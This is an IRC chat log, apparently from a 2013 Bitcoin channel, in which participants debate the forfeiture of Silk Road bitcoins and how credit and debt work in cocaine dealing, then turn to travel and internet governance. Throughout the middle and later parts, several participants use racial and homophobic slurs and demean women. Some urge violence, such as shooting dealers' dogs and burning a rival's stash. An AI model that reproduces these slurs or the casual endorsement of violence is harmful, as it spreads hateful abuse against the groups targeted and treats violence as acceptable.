opportune time to add, for the benefit of readers who weren't around in the 1980's, that the law pertaining to in rem forfeitures developed in the context of narcotics seizures. Prior to that, the legal maxim, the law abhors a forfeiture, was the rule, and judges were generally antagonistic to forfeiture proceedings. Oct 11 20:54:51 In the 80's, with the crack outbreak, the feds began aggressively seeking forfeiture of proceeds, substitute proceeds and instrumentalities of crime. At the time, no one (except those of us actively engaged in the drug and forfeiture defense ) gave a damn, and the law that developed was quite harsh. Oct 11 20:54:55 dont pretend these people deserve their btc back Oct 11 20:55:08 there. good poibnt. the entire in rem proceeding is a laughable piece of nonsense, in law. Oct 11 20:55:26 ThickAsThieves unless you have proof of the foregoing, it's not that they "deserve" it. Oct 11 20:55:33 it's that it;s theirs and you're stealing it. Oct 11 20:55:45 no better than the guy you're supposedly prosecuting. in fact, worse. he traded, he didn't steal. Oct 11 20:55:54 but the accounts are owned by SR Oct 11 20:55:57 not the users Oct 11 20:56:03 says who ? Oct 11 20:56:12 SR holds the keys Oct 11 20:56:14 actually the current US policy re: forfeiture is very exactly Soviet. Oct 11 20:56:17 well, my house is owned by the bank. doesn't mean they can come take my television. Oct 11 20:56:21 cool. gotta remember this for the pirate case. Oct 11 20:56:24 he owned the btc right ? Oct 11 20:56:32 asciilifeform indeed. Oct 11 20:56:41 in that case he issued securities Oct 11 20:56:47 nono, it was his btc. Oct 11 20:56:53 cause he had the keys. Oct 11 20:57:03 he was not the marketplace, was he? Oct 11 20:57:34 derp. Oct 11 20:57:35 what's the argument for these people not "deserving" their btc back? Oct 11 20:57:45 nubbins` they had it, the government wants it. Oct 11 20:57:50 they are all criminalz Oct 11 20:57:52 because they put them on a website where bad people sold bad things? Oct 11 20:58:26 i advance the opinion that it's not anyone else's place to decide who deserves my money, regardless of where i keep it Oct 11 20:58:35 you kept money on SR? Oct 11 20:58:42 coming soon to a walmart near you, your car was impounded because you parked it last month in the parking lot of a supermarket that was violating federal regulation #. Oct 11 20:58:43 i'm not saying my point is a solid argument to do it, but we all know those people wont get their coins Oct 11 20:59:02 ThickAsThieves well yeah they won't. but there's no solid argument, and that's important. Oct 11 20:59:02 tat, we all know this, yes Oct 11 20:59:16 we also all know that it's groundless Oct 11 20:59:17 basicvally the usg is indistinguishable in practice from the common criminal. Oct 11 20:59:19 but it won't be fought for Oct 11 20:59:19 even if they wanted to give them back, could they do so reliably? Oct 11 20:59:29 maybe they hire TATI to do migrations Oct 11 20:59:32 ahahah Oct 11 20:59:38 well, they could put the website back up with the listings removed Oct 11 20:59:55 although we all know that nobody would withdraw their funds anyway Oct 11 20:59:56 nubbins` the gigavps method Oct 11 21:00:03 mp, before my time Oct 11 21:00:04 "send us a signed thing via mail" Oct 11 21:00:17 some goods on SR were legal Oct 11 21:00:23 some, yes Oct 11 21:00:29 were there ? like what ? Oct 11 21:00:40 i can't recall Oct 11 21:00:45 porn passwords Oct 11 21:00:46 eh, i think that more services should allow you to "attach" your own wallet Oct 11 21:00:51 nothing of value Oct 11 21:00:52 and keep your private keys Oct 11 21:00:59 that way...this never happens Oct 11 21:01:20 also, you don't have to manage user funds, and take that liability Oct 11 21:01:22 mjr_: so a 3-party tx where the site acts as escrow? Oct 11 21:01:23 there were small things available like certain pipes and stuff like that Oct 11 21:01:35 and people sold bitcoins or cash for bitcoins Oct 11 21:01:45 no...basically, i have a blockchain wallet already Oct 11 21:01:46 and there was that blotter artwork Oct 11 21:01:47 let me use that Oct 11 21:01:49 attaching your own wallet wont work Oct 11 21:01:53 it wasn't actual blotter, just artwork Oct 11 21:01:55 why not? Oct 11 21:02:03 plus you lose the ability to do offchain tx Oct 11 21:02:05 porn passwords aren;'t legal. Oct 11 21:02:08 depends Oct 11 21:02:11 blotter artwork is an interesting thing Oct 11 21:02:19 unless you do it like Weex Oct 11 21:02:24 my point is that to do off chain you have to trust the site operator Oct 11 21:02:34 and in the case of SR you lost your money Oct 11 21:02:49 i think you should have an option to attach your blockchain wallet, people can see how much funds you have Oct 11 21:02:55 i suppose i should go silkscreen a huge BTC logo on a nice thick cotton rag paper, and then perforate it into tiny squares Oct 11 21:02:58 sell it for $50 on ebay Oct 11 21:02:59 mjr_ in fairness, i expect the lost btc mostly belonged to the operator, and some to dealers. Oct 11 21:03:02 you can still both send multisig to an administrative site Oct 11 21:03:08 it's unlikely any end user kept 100 btc in there Oct 11 21:03:20 depends Oct 11 21:03:22 i agree Oct 11 21:03:26 in the broad case Oct 11 21:03:32 [HAVELOCK] [AM1] 2 @ 0.93220001 = 1.8644 BTC [-] {2} Oct 11 21:03:33 but if one person had his 100 bitcoin stolen Oct 11 21:03:34 mircea_popescu: biggest losers were the dealers. thousands of $$ in limbo at any given time Oct 11 21:03:37 is it ok? Oct 11 21:03:49 yeah, and i wonder how the people the dealers owe money to will feel Oct 11 21:03:59 pretty good Oct 11 21:04:00 mjr_ the cost for the joe schmoes to understand and use multi tx > the probable loss to them as is. Oct 11 21:04:08 you need to realize that selling on sr was VERY lucrative Oct 11 21:04:11 yes Oct 11 21:04:13 of course Oct 11 21:04:19 any sensible dealer would be paying for supply up-front Oct 11 21:04:20 i think 2 things about SR Oct 11 21:04:22 not getting it on loan Oct 11 21:04:23 uh no Oct 11 21:04:24 nubbins` heh. that's why they took a month to move a kg of coke ? Oct 11 21:04:26 my personal feeling is that you go off-chain your money is a row in a database Oct 11 21:04:26 yeah Oct 11 21:04:30 nobody gave a shit. Oct 11 21:04:35 and we al know how safe site db's are Oct 11 21:04:37 let me get a kilo please, here is all the cash Oct 11 21:04:47 and you assume that consignment is not the main model Oct 11 21:04:51 mircea_popescu: if i had to bet, i'd say it was WAY more weed than coke Oct 11 21:04:52 which it is Oct 11 21:05:01 mjr_: in the real world, yes Oct 11 21:05:02 of course. Oct 11 21:05:09 those were real world people Oct 11 21:05:16 who may not buy coke in colombia using bitcoins Oct 11 21:05:21 but rther have traditional channels Oct 11 21:05:25 and then resell on SR Oct 11 21:05:35 yes and they are now mostly dead Oct 11 21:05:36 traditional channel = i'll front you a brick Oct 11 21:05:45 mjr_: i said any sensible dealer Oct 11 21:05:50 my point Oct 11 21:05:52 getting a brick on loan is not sensible Oct 11 21:05:55 whether it's common or not Oct 11 21:05:56 LOL Oct 11 21:06:00 it is totally sensible Oct 11 21:06:05 look, srsly, the site was "very lucrative" in the sense of yeah, if you're some college age dork you can make A LOT OF $$$ omg/ Oct 11 21:06:06 no it's not!! Oct 11 21:06:07 for the vast majority of people Oct 11 21:06:10 because when you get busted Oct 11 21:06:10 it wasn't lucrative in a business sense. Oct 11 21:06:15 now you owe some guy a brick Oct 11 21:06:21 and you can't pay him for it Oct 11 21:06:23 yeah, that is built in to what you pay Oct 11 21:06:43 and depends on how much your health is worth to you, and the chance you think you'll default Oct 11 21:06:56 like saying no sensible business risks using credit Oct 11 21:07:01 because it could hurt their credit Oct 11 21:07:02 fair enough Oct 11 21:07:16 first off; main risk in drugs is moving them Oct 11 21:07:17 i have an acquaintance who was caught with a large amount of cocaine a couple of years ago Oct 11 21:07:28 let's split your dispute. people sane in the head take a brick on credit all the time, Oct 11 21:07:30 so, most dealers would rather give you 100 grams NOW, once a month Oct 11 21:07:34 provided it's a small fraction of their trade. Oct 11 21:07:36 [HAVELOCK] [AM100] 55 @ 0.00923976 = 0.5082 BTC [+] {2} Oct 11 21:07:38 then meet you for 5 grams every other day Oct 11 21:07:49 fucked in the head idiots that take a brick on credit which is the whole of their capital... Oct 11 21:07:54 ^^ Oct 11 21:07:57 ^^^^^ Oct 11 21:07:58 well... those idiots don't survive and shouldn't have existed in the first place Oct 11 21:07:59 yes Oct 11 21:08:00 mircea_popescu: that's like every coke dealer Oct 11 21:08:13 nubbins` every coke dealer you know :) Oct 11 21:08:13 ok, i know many people who have been wiped out Oct 11 21:08:15 lost their stash Oct 11 21:08:19 SHHHHH! Oct 11 21:08:24 got someone to front them Oct 11 21:08:27 built it back up again Oct 11 21:08:48 its more like a trade guild than the "colombian necktie/scarface" scenario Oct 11 21:08:52 yeah Oct 11 21:08:55 mjr_ this is not germane, in that it was THEIR stash to lose. Oct 11 21:09:03 ys Oct 11 21:09:06 anyway, having large amounts of outstanding credit is not a great idea Oct 11 21:09:11 but lets say i have been working with you for a year Oct 11 21:09:13 you have made money Oct 11 21:09:19 and SR bust comes Oct 11 21:09:21 nubbins` especially if you're a deadbeat, which is what it boils down to. Oct 11 21:09:24 do you think i just kill you? Oct 11 21:09:29 no, you are a client Oct 11 21:09:33 no, you don't kill me Oct 11 21:09:36 mjr_ depends. are you some white ass dorky kid that "has got to do it" ? Oct 11 21:09:37 and people uderstand and work out terms Oct 11 21:09:37 you threaten to break my bones Oct 11 21:09:42 then you might internet-kill me. Oct 11 21:09:45 LOL Oct 11 21:09:53 "understanding", "working out terms", are a fiction for street-level trades Oct 11 21:09:56 you guys really have a hollywood perspective on drug dealing Oct 11 21:10:01 and when i say street-level i mean 10kg and below Oct 11 21:10:04 ok...whatever you say Oct 11 21:10:28 lets say i know people who were "late" by a couple of months and resumed their arrangement after making good Oct 11 21:10:34 MANY times Oct 11 21:10:42 my old roommate was a pretty big coke dealer in NYC Oct 11 21:10:48 i live a three-minute walk from a house where a guy was tied up and beaten to death with a chair leg by a coke dealer Oct 11 21:11:02 are you in nyc? Oct 11 21:11:04 i guess people are nicer in NYC Oct 11 21:11:07 they are Oct 11 21:11:13 they are very business focused Oct 11 21:11:17 must be great Oct 11 21:11:20 killing someone gives you $0 Oct 11 21:11:21 it's all skids here Oct 11 21:11:28 um most people who sell drugs dont beat people Oct 11 21:11:31 and no future revenue either Oct 11 21:11:33 killing someone makes everyone who owes you $1 pay up Oct 11 21:11:37 nope Oct 11 21:11:39 granted, i don't think they intended to kill the guy Oct 11 21:11:46 thats like saying death penalty stops crime Oct 11 21:11:53 it doesn't Oct 11 21:11:54 i don't do crimes thinking i will get caught and convicted Oct 11 21:12:05 so i don't borrow bricks expecting to default Oct 11 21:12:19 i borrow a brick so i can make $10k easily Oct 11 21:12:21 that's the thing, nobody expects it Oct 11 21:12:25 what could ever go wrong? Oct 11 21:12:29 which is why nobody is ready for it Oct 11 21:12:29 yes Oct 11 21:12:38 but the guy lending it to you is ready for it Oct 11 21:12:42 he manages his risk Oct 11 21:12:44 at least in nyc Oct 11 21:12:50 so that if he has to wait Oct 11 21:12:53 which is why you exit the courthouse after entering your not guilty plea and immediately get a phone call from some guy looking for his $7000 Oct 11 21:12:54 he can resume operations Oct 11 21:12:59 and regain revenue stream Oct 11 21:13:07 umm i want to get in touch with a nignog that will lend me 100k Oct 11 21:13:18 it is relative Oct 11 21:13:30 if i have an operation where i do 10 million Oct 11 21:13:33 i lend 100k all the time Oct 11 21:13:35 i think the difference between here and nyc is that in nyc it's all rich people doing coke Oct 11 21:13:46 $50 for .5g Oct 11 21:13:48 and here it's all pill addicts doing AND selling coke Oct 11 21:13:49 i'd say so Oct 11 21:14:07 its like any business Oct 11 21:14:08 coke sucks Oct 11 21:14:14 there is nothing special about coke business Oct 11 21:14:17 never tried coke, never will Oct 11 21:14:19 same as anytingelse Oct 11 21:14:21 i like things too much Oct 11 21:14:31 it would be the end of me Oct 11 21:14:35 wholesalers offer credit to increase sales Oct 11 21:14:43 manage risk across multiple accounts Oct 11 21:14:49 write off some bad debg Oct 11 21:14:50 it wouldnt be the end of you because it fucking sucks Oct 11 21:15:05 credit serves to expand an economy Oct 11 21:15:06 the miniute you take it you feel like your dick is going to fall off Oct 11 21:15:13 and you feel like you will have a heart attack Oct 11 21:15:14 mjr_: so if i get a kg off some guy and say "sorry dude, i got busted", he's gonna swallow the cost? Oct 11 21:15:15 lol i don't know what you are doing Oct 11 21:15:20 no Oct 11 21:15:21 asciilifeform according to wikipedia, russia is not YET a NIC (newly industrialised country) Oct 11 21:15:38 if you have been getting a kg a month for 12 months Oct 11 21:15:41 and you have a problem now Oct 11 21:15:52 he will say "ok, let's work it out and get you back on your feet" Oct 11 21:15:55 oh, well Oct 11 21:15:58 it's not like that everywhere Oct 11 21:16:02 remember, he has made money off you for 12 months Oct 11 21:16:10 and would rather continue making money off you Oct 11 21:16:13 than killing you Oct 11 21:16:26 you should see all the new york niggers that run my town of 30k they run it for about a year and the police come down hard on these idiots Oct 11 21:16:28 killing you means never being repaid, and never getting any more revenue Oct 11 21:16:29 if you try that here, he will say "ok, i've been breeding pit bulls for 3 years and i bit a guy's ear off in a bar fight last week, pay up" Oct 11 21:16:31 they dont know how to get out the game Oct 11 21:16:45 killing is rare Oct 11 21:16:49 i'm not saying people don't intimidate Oct 11 21:16:52 getting your face rearranged, not so much Oct 11 21:16:54 they have no legal recourse Oct 11 21:16:59 but for the most part Oct 11 21:17:01 at least in nyc Oct 11 21:17:05 its a community thing Oct 11 21:17:09 washington heights Oct 11 21:17:13 hahahahaha Oct 11 21:17:14 parts of brooklyn Oct 11 21:17:19 everyone knows everyone Oct 11 21:17:24 they are your neighbors Oct 11 21:17:31 its a trade off, offer credit Oct 11 21:17:34 i'm only laughing because that all sounds so foreign Oct 11 21:17:35 more sales Oct 11 21:17:35 why you let niggers intimidate you, carry a hand gun on your body and shoot the dogs Oct 11 21:17:43 LOL Oct 11 21:17:47 no cop cares about some niggers pitbulls Oct 11 21:17:49 they would never think to get their own Oct 11 21:17:52 guns that is Oct 11 21:18:02 and they WILL get emotional about a dog Oct 11 21:18:07 not so much about business, i think Oct 11 21:18:08 they call themselves gangsters HAHA Oct 11 21:18:10 dont even have guns Oct 11 21:18:19 anyway, boring convo Oct 11 21:18:26 anyway what it boils down to, mjr, is that the coke trade is a mature industry in nyc Oct 11 21:18:28 drug business is the same as all business Oct 11 21:18:28 so then shoot the dog, take his girlfriend and burn his stash. Oct 11 21:18:37 yes nubbins` Oct 11 21:18:39 i went with my friend to buy a 3k car in philly we brought a hand gun Oct 11 21:18:39 tjhey'll call you gengis khan Oct 11 21:18:40 i agree Oct 11 21:18:40 and here it's a bunch of wannabe players acting like they just walked off the set of a 50 cent movie Oct 11 21:18:45 oh totally Oct 11 21:18:48 [MPEX] [S.MPOE] 8650 @ 0.00085618 = 7.406 BTC [+] {3} Oct 11 21:18:50 if you go to the inland empire in california Oct 11 21:19:00 it is way scarier than the jungle in LA Oct 11 21:19:07 because people in LA have SOME pride in themselves Oct 11 21:19:14 http://www.cbc.ca/news/canada/newfoundland-labrador/murder-trial-dates-set-for-pynn-butler-1.1353717 Oct 11 21:19:14 people in the IE have nothing to live for Oct 11 21:19:15 Murder trial dates set for Pynn, Butler - Newfoundland & Labrador - CBC News Oct 11 21:19:20 ^^ newfie coke lords Oct 11 21:19:35 you live in a dog ?! Oct 11 21:19:39 when you live in shitty places, and have no hope, you really don't care about violence or killing Oct 11 21:19:55 mircea_popescu: two breeds of dog were developed on this island, the newfoundland dog and the labrador retriever Oct 11 21:20:05 but in new york, people are happy, so most people would be like "woah woah, why jump to violence" Oct 11 21:20:09 one was bred from the other, i forget which Oct 11 21:20:15 no one cares about black killing eachother, its we like to report it just to show everyone how stupid they act Oct 11 21:20:30 i personaly would like to see the crime rate 10x worse Oct 11 21:20:31 new york has like triple digit murders per year Oct 11 21:20:43 mjr_ dunno about that happy part man, i've seen what they call rental apts down there. Oct 11 21:20:44 ie. 999 people in a city of over 6 million Oct 11 21:20:51 well, not mad enough to kill yet Oct 11 21:20:51 thats not bad for a city of millions Oct 11 21:21:02 it is like the safest city ever Oct 11 21:21:03 its beause they frisk all the nignogs Oct 11 21:21:06 lol Oct 11 21:21:08 lol. this town i'm in has had a murder last 4 years ago. it's ~400k pop. do the math. Oct 11 21:21:13 its either a police gang or the street gangs Oct 11 21:21:14 they frisk whites and puerto ricans too Oct 11 21:21:35 its about how you act, who you associate with, and how you SPEAK more than anything else Oct 11 21:21:50 http://www.cbc.ca/news/canada/newfoundland-labrador/ear-biting-suspect-not-believable-crown-1.961453 Oct 11 21:21:51 [HAVELOCK] [B] [XBOND] 122 @ 0.001199 = 0.1463 BTC [-] Oct 11 21:21:51 Ear-biting suspect not believable: Crown - Newfoundland & Labrador - CBC News Oct 11 21:21:52 well i wouldnt change it, like i said police acting as the gang or nigs running around with guns scarring white people Oct 11 21:21:53 what is this, dating ?! Oct 11 21:21:55 but seriuosly DRESS and SPEECH are about a million times more important than SKIN COLOR Oct 11 21:22:09 and people CAN change their dress and speech Oct 11 21:22:20 my friend is a VP at MetLife Oct 11 21:22:22 he is black Oct 11 21:22:29 guess how many times he has been stopped and frisked Oct 11 21:22:33 0 Oct 11 21:22:35 bingo Oct 11 21:22:37 nubbins` is thatg phynn dude with the insane clown posse ? Oct 11 21:22:38 ;) Oct 11 21:22:46 mircea_popescu: might as well be Oct 11 21:22:50 its like dave chappelle says Oct 11 21:22:57 but he talks about white people Oct 11 21:22:59 mircea_popescu: notice how his teardrop tattoos are filled in Oct 11 21:23:01 i think its about white culture Oct 11 21:23:06 yaya Oct 11 21:23:10 apparently this means vengeance was served! Oct 11 21:23:14 big thug! Oct 11 21:23:19 feeling comfortable walking up to a cop and saying, im a little high, and i just wanna get home Oct 11 21:23:20 killed his buddy over sixty bucks! Oct 11 21:23:37 says, i am the one you protect, not the one you harrass Oct 11 21:23:38 all you gotta do is dress in a suit and tie and i bet you could run drugs all day Oct 11 21:23:42 yeah Oct 11 21:23:53 most drug dealers on a personal level do not look like what you would think Oct 11 21:24:01 agreed Oct 11 21:24:03 i've seen pretty girls, white hipsters on backpacks Oct 11 21:24:05 its rarely thugs Oct 11 21:24:15 they don't get their hand dirty with small transactions Oct 11 21:24:21 they arnt dealing heroin Oct 11 21:24:26 they are dealing pills and weed Oct 11 21:24:26 also they know they stick out Oct 11 21:24:48 well, all i can say is panama is great so far Oct 11 21:24:52 lovely Oct 11 21:24:55 always wanted to visit Oct 11 21:24:57 viva south america Oct 11 21:25:01 closest i came was colombia Oct 11 21:25:07 even better ;) Oct 11 21:25:12 why are you down there Oct 11 21:25:17 nah, colombia is overrun with aussie tourists Oct 11 21:25:17 trying to act like a big shot? Oct 11 21:25:27 and petty crime Oct 11 21:25:33 not sure which is worse Oct 11 21:26:01 where are you in panama Oct 11 21:26:09 panama city Oct 11 21:26:14 but colombian girls are hot Oct 11 21:26:26 agreed Oct 11 21:26:26 my sister is in cartagena (that had nothing to do with the prior statement) Oct 11 21:26:31 heh Oct 11 21:26:34 cartagena was nice Oct 11 21:26:36 very expensive Oct 11 21:26:39 why when people go on vacation they go to the largest cities Oct 11 21:26:44 go somewhere remote Oct 11 21:26:48 yeah Oct 11 21:26:50 san blas Oct 11 21:26:52 i spent 2 days in cartagena Oct 11 21:26:56 being around an infestation of people is not a vacation Oct 11 21:26:57 then moved on Oct 11 21:27:07 spent a lotta time in taganga, which was much nicer Oct 11 21:27:19 medellin was not nice Oct 11 21:27:24 manizales was great Oct 11 21:27:28 bogota was so-so Oct 11 21:27:41 you guys just travel by yourself? Oct 11 21:27:48 myself and a friend Oct 11 21:27:51 i usually travel alone Oct 11 21:28:00 that was my first vacation with a travel partner Oct 11 21:28:29 if you're comfortable being self-reliant, solo travel is 1000x better Oct 11 21:28:56 nah, you always travel with a woman or two. Oct 11 21:28:58 [HAVELOCK] [AM100] 22 @ 0.00924 = 0.2033 BTC [+] Oct 11 21:29:01 traveling alone is best Oct 11 21:29:05 no way. Oct 11 21:29:08 o yeah Oct 11 21:29:10 hands down. Oct 11 21:29:16 mircea_popescu: travel with a woman and you preclude yourself from meeting nearly as many other women Oct 11 21:29:22 how do you figure ? Oct 11 21:29:25 travel with 2 other guys, thats the best way Oct 11 21:29:30 i figure from experience Oct 11 21:29:34 traveling with women is fucking anoying as shit Oct 11 21:29:37 alone or gtfo Oct 11 21:29:38 you're not picking the right women to travel with. Oct 11 21:29:40 solo travel, hands down Oct 11 21:29:53 you can do whatever the fuck you want, you meet way more people Oct 11 21:29:53 yeah nubbins`, we can go solo together ! Oct 11 21:29:55 oh wait. Oct 11 21:29:57 lel Oct 11 21:30:00 .d Oct 11 21:30:01 189281249.28103 | Next Diff in 1115 blocks | Estimated Change: 21.0205% in 6d 2h 40m 43s Oct 11 21:30:16 i feel more comfortable if i have a wingman Oct 11 21:30:17 nubbins` why can't you do the fuck you want with a woman in tow ? Oct 11 21:30:31 nospinzy try a wingwoman sometime. Oct 11 21:30:36 no Oct 11 21:30:38 plus, when you travel solo, you take way more risks that you wouldn't necessarily otherwise Oct 11 21:30:42 im not a bitch Oct 11 21:30:43 and risks are fun Oct 11 21:30:48 uh Oct 11 21:30:51 none of this figures. Oct 11 21:30:55 lol Oct 11 21:30:55 what is this travel you speak of Oct 11 21:31:06 i'd be dead if it weren't for the kindness of strangers Oct 11 21:31:08 ten times over Oct 11 21:31:11 im around alot of girls, and it all amounts to the same nonsense Oct 11 21:31:20 if i had travelled with a friend, i wouldn't have been nearly so reckless Oct 11 21:31:29 and so would have missed out on all those brushes with death Oct 11 21:31:33 nospinzy you gotta have well trained girls not rifraf. Oct 11 21:32:22 and what is life without risk? Oct 11 21:32:26 boring, that's what Oct 11 21:32:36 i dont know man, id rather travel with another guy and we can have in depth conversations about what we observe Oct 11 21:32:40 with a women well..... Oct 11 21:32:45 not much can get talked about Oct 11 21:32:46 traveling with women can be annoying Oct 11 21:32:53 traveling with anyone can be annoying Oct 11 21:32:53 anyway Oct 11 21:32:54 you can;'t be serious. Oct 11 21:33:00 i don't like beaches and stuff Oct 11 21:33:04 ye aim totaly serious you fucking faggot Oct 11 21:33:05 i wanted to cave my best friend's face in after travelling with him for two weeks Oct 11 21:33:05 what am i gonna do with some sand Oct 11 21:33:08 not much can be talked about with women because why Oct 11 21:33:13 mjr_ exactly Oct 11 21:33:19 mjr_: get it in your pussy? Oct 11 21:33:20 if you think talking to a women is somehow more indepth then a male you have issues Oct 11 21:33:33 or you might be someones gay best friend Oct 11 21:33:34 i guess my issues are not being a faggot ? Oct 11 21:33:34 it can be nice to travel to places where you know women Oct 11 21:33:40 so you got blood and sand now nubbins`? Oct 11 21:33:44 but you can go off on your own Oct 11 21:33:49 kakobrekla: it's a train wreck down there Oct 11 21:33:56 lol Oct 11 21:34:02 but anyway, i guess many people might not share my views Oct 11 21:34:10 whatg, on the internet ? Oct 11 21:34:12 impossible! Oct 11 21:34:12 i like traveling to big cities Oct 11 21:34:15 but there's nothing better than travelling to a country where you don't speak the language Oct 11 21:34:20 i like traveling to big tities Oct 11 21:34:20 with your first night booked at a hostel Oct 11 21:34:23 yeah. i do that too. Oct 11 21:34:26 and all your possessions in a small backpack Oct 11 21:34:26 that is fun Oct 11 21:34:32 i totally agree Oct 11 21:34:36 adventure! Oct 11 21:34:38 huzzah! Oct 11 21:34:39 nubbins` i don't book anything. i jsut land, go to the local university, find the english dept Oct 11 21:34:42 it ruins it when people speak english Oct 11 21:34:49 and hire some chick to show me around Oct 11 21:35:00 colombia was great for this, nobody speaks a fuckin word of english Oct 11 21:35:06 i speak spanish. Oct 11 21:35:07 mircea_popescu: that's actually a really good idea Oct 11 21:35:20 nubbins` it is. then i have her hire me an apt Oct 11 21:35:20 i've got rudimentary spanish Oct 11 21:35:23 that way i pay local rates. Oct 11 21:35:32 mostly transferred from 6 years of mandatory french education Oct 11 21:35:34 (go canada) Oct 11 21:36:02 surprising how many similarities Oct 11 21:36:04 [MPEX] [S.MPOE] 2126 @ 0.00084907 = 1.8051 BTC [-] Oct 11 21:36:15 if i didn't know a word, i'd just say the french word with a spanish accent Oct 11 21:36:18 worked more often than not Oct 11 21:36:37 french also gives you access to a lot of africa Oct 11 21:36:43 saved my ass in morocco Oct 11 21:36:56 (which isn't REAL africa, but i digress) Oct 11 21:39:07 [MPEX] [O] [O.USD.C131T] 685 @ 0.32277052 = 221.0978 BTC [-] Oct 11 21:40:03 o Oct 11 21:40:32 jeez i leave you people for two minutes... Oct 11 21:40:36 ;;ticker Oct 11 21:40:37 MtGox BTCUSD ticker | Best bid: 140.34004, Best ask: 141.31213, Bid-ask spread: 0.97209, Last trade: 140.44227, 24 hour volume: 6905.00279714, 24 hour low: 138.87001, 24 hour high: 141.69000, 24 hour vwap: 140.61436 Oct 11 21:40:48 twas so good read... Oct 11 21:40:54 ;;calc 131 / .68 Oct 11 21:40:55 192.647058824 Oct 11 21:41:09 [MPEX] [S.MPOE] 4045 @ 0.00084719 = 3.4269 BTC [-] Oct 11 21:42:27 are there lots of whores in panama Oct 11 21:42:44 i dream of such travel sometimes and even tried a bit.. but then it comes to communication and that drives me crazy Oct 11 21:43:11 litereally they asked me in a hostel on checkout why i did not talk much so anyone Oct 11 21:43:11 jurov just nod a lot. Oct 11 21:43:23 thats why u need your google glass with transaltion Oct 11 21:43:44 cuz i'm almost deaf and small talk is hardest work, fuck that Oct 11 21:43:46 the key is to speak spanish, but also be able to look like you don't speak spanish Oct 11 21:44:07 like Blade, all the strengths, none of the weaknesses Oct 11 21:44:24 heh Oct 11 21:44:25 i'm not interested to be a clown Oct 11 21:44:34 my last name is pronounced the same way as the word for marijuana in morocco Oct 11 21:44:46 0_0 Oct 11 21:45:01 so when i checked in at EVERY hostel Oct 11 21:45:09 there'd always be jokes about calling the cops Oct 11 21:45:11 ;( Oct 11 21:45:27 this reminds me Oct 11 21:45:31 do people treat you with respect if you say you are an americna Oct 11 21:45:33 abroad Oct 11 21:45:36 followed by darting eyes and a mumbled "hashish?" Oct 11 21:45:40 nospinzy: no idea, i'm canadian Oct 11 21:45:42 i used to know this dorky kid, his idea of travel was he'd go to some town, and check in every hostel Oct 11 21:45:44 for a day or two Oct 11 21:45:49 see if there was any desperate tail Oct 11 21:45:52 then move on to next hostel Oct 11 21:45:54 nubbin you can pretend you are american Oct 11 21:45:55 heh Oct 11 21:46:00 he'd be doing this all day long Oct 11 21:46:04 nospinzy: why the fuck would i pretend i'm an american? Oct 11 21:46:12 i'd sooner pretend to have down's Oct 11 21:46:13 didn't you like risks ? Oct 11 21:46:25 that's not a risk Oct 11 21:46:29 that's debasing yourself Oct 11 21:46:33 "that's not a risk, it's a fucking liability" Oct 11 21:46:39 nubbin keep up that attitude and we will drone strike your country Oct 11 21:46:44 although TBH most of the americans i met while travelling were a-ok Oct 11 21:46:52 it's the aussies and israelis that are the worst Oct 11 21:46:57 loud, brash, stupid Oct 11 21:47:20 whenever i see ausies they are punk faggots kids Oct 11 21:47:50 and why the hell do they complain about asians so much Oct 11 21:47:55 they have no idea Oct 11 21:48:23 omg now they want to integrate xrp with urbit lol Oct 11 21:48:45 mod6 that's such a splendid idea :D Oct 11 21:48:56 i hope thety do it on a ven platform Oct 11 21:50:27 heheh - here's some convo: http://pastebin.com/ Oct 11 21:50:29 bah Oct 11 21:50:37 http://pastebin.com/G4t53Mz3 Oct 11 21:50:37 (11:41) < mod6> i started my new blockchain pull at the same time as trying to u - Pastebin.com Oct 11 21:51:48 lol Oct 11 21:52:07 wait, is memnion actually the chief retard of the entire project ? Oct 11 21:54:04 does the forum care about swearing? Oct 11 22:01:30 [HAVELOCK] [KCIM] 8 @ 0.091 = 0.728 BTC [-] Oct 11 22:02:56 now they're all on about colored coins.. lol. pointed them to the log from yesterday & the trilema article. Oct 11 22:03:18 mircea_popescu: im not sure who he is acutually, but he seems to be knowledgeable. Oct 11 22:05:22 http://www.internetgovernance.org/2013/10/11/the-core-internet-institutions-abandon-the-us-government/ srsly? Oct 11 22:05:22 The core Internet institutions abandon the US Government | IGP Blog Oct 11 22:07:54 well it's not fair that only the US should have their fingers in the web Oct 11 22:08:09 now all the countries wanns wet their tips Oct 11 22:08:13 wanna Oct 11 22:10:14 i mean, what's exactly the difference? Oct 11 22:10:58 i honestly dont know Oct 11 22:11:13 maybe they are just waking up to realize there is none Oct 11 22:12:32 i see only political maneuvering... if they proposed to implement namecoin for root dns Oct 11 22:12:46 or replace bgp with some decetralized routing Oct 11 22:12:53 that would be something Oct 11 22:13:53 !seen dexX7 Oct 11 22:14:40 mod6 it's fascinating hopw people default to the wrong decisions Oct 11 22:14:41 to be precise, bgp is kinda decentralized but IP addy allocation is not Oct 11 22:15:17 jurov there's some tension, but that's an overstatement really. Oct 11 22:15:52 mircea_popescu: yeah. some ideas just sound great and seem like amazing harmless solutions. but yah, stuff doesn't work that way. Oct 11 22:15:53 AMAZING COMPANY! Oct 11 22:15:57 bingo Oct 11 22:16:07 it's not just in computing, either. Oct 11 22:16:32 college kid wants a roadster. the sort of car for him is not a roadster, he's about to get married and have kids. Oct 11 22:16:40 etc etc, endless and everywhere, the wrong thing always appeals. Oct 11 22:16:44 it's due to shallow thought, most people don't attempt to think more than a layer or two deep on things Oct 11 22:17:14 it's sorta like looking down the barrel of a gun and pulling the trigger to see why it isnt working Oct 11 22:17:16 like the fat kid who love cake Oct 11 22:17:20 or in the immortal words of the devil himself, "He gives man instincts. He gives you this extraordinary gift, and then what does He do, I swear for His own amusement, his own private, cosmic gag reel, He sets the rules in opposition. It's the goof of all time. Look but don't touch. Touch, but don't taste. Taste, don't swallow. Ahaha. And while you're jumpin' from one foot to the next, what is he doing? He's laughin' Hi Oct 11 22:17:20 s sick, fuckin' ass off!" Oct 11 22:17:46 [MPEX] [S.MPOE] 2179 @ 0.00084719 = 1.846 BTC [-] Oct 11 22:17:51 devli's advocate? Oct 11 22:17:55 yea Oct 11 22:17:59 great movie Oct 11 22:18:01 yeah. Oct 11 22:19:03 i only remember the text because it causes images and sounds in my head from pacino's performance Oct 11 22:19:18 possibly the highlight of his very highlighted career. Oct 11 22:19:56 yeah, good flick Oct 11 22:20:49 [HAVELOCK] [AM100] 42 @ 0.00941999 = 0.3956 BTC [+] Oct 11 22:24:40 "How your Profile name and photo may appear (including in reviews and advertising)" Oct 11 22:24:46 google... Oct 11 22:25:41 for people who wanna shut it off, just visit https://plus.google.com/settings/endorsements?hl=en Oct 11 22:25:54 [HAVELOCK] [HIM] 3 @ 0.0899 = 